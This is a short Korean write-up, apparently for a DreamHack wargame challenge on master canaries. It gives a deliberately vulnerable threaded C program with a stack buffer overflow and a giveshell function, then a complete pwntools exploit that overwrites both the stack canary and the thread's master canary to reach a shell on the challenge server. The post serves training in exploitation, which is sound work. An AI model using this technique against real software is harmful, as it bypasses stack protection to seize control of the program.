[DreamHack System Hacking] Master Canary - (2)

문제 코드

// Name: mc_thread.c
// Compile: gcc -o mc_thread mc_thread.c -pthread -no-pie
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void giveshell() { execve("/bin/sh", 0, 0); }
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}

int read_bytes (char *buf, int len) {
  int idx = 0;
  int read_len = 0;

  for (idx = 0; idx < len; idx++) {
    int ret;
    ret = read(0, buf+idx, 1);
    if (ret < 0) {
      return read_len; 
    }
    read_len ++;
  }

  return read_len;
}

void thread_routine() {
  char buf[256];
  int size = 0;
  printf("Size: ");
  scanf("%d", &size);
  printf("Data: ");
  //read(0, buf, size);
  read_bytes(buf, size);
}

int main() {
  pthread_t thread_t;

  init();

  if (pthread_create(&thread_t, NULL, (void *)thread_routine, NULL) < 0) {
    perror("thread create error:");
    exit(0);
  }
  pthread_join(thread_t, 0);
  return 0;
}

 

바로 이전에서 학습한 코드와 같으므로 같은 분석 방법을 사용해서 스택 오버 플로우를 통해 카나리를 덮어쓸 것이다.

https://dacoding.tistory.com/72

[DreamHack System Hacking] Master Canary - (1)

 

 

익스플로잇 코드

# Name: mc_thread.py
from pwn import *
#p = process("./mc_thread")
p = remote("host3.dreamhack.games", 19360)
elf = ELF('./mc_thread')
giveshell = elf.symbols['giveshell']
payload = b"A"*264
payload += b"A"*8 # canary
payload += b"B"*8
payload += p64(giveshell)
payload += b"A"*(0x948-len(payload))
payload += p64(0x4141414141414141) # master canary
inp_sz = len(payload)
p.sendlineafter("Size: ", str(inp_sz))
p.sendlineafter("Data: ", payload)
p.interactive()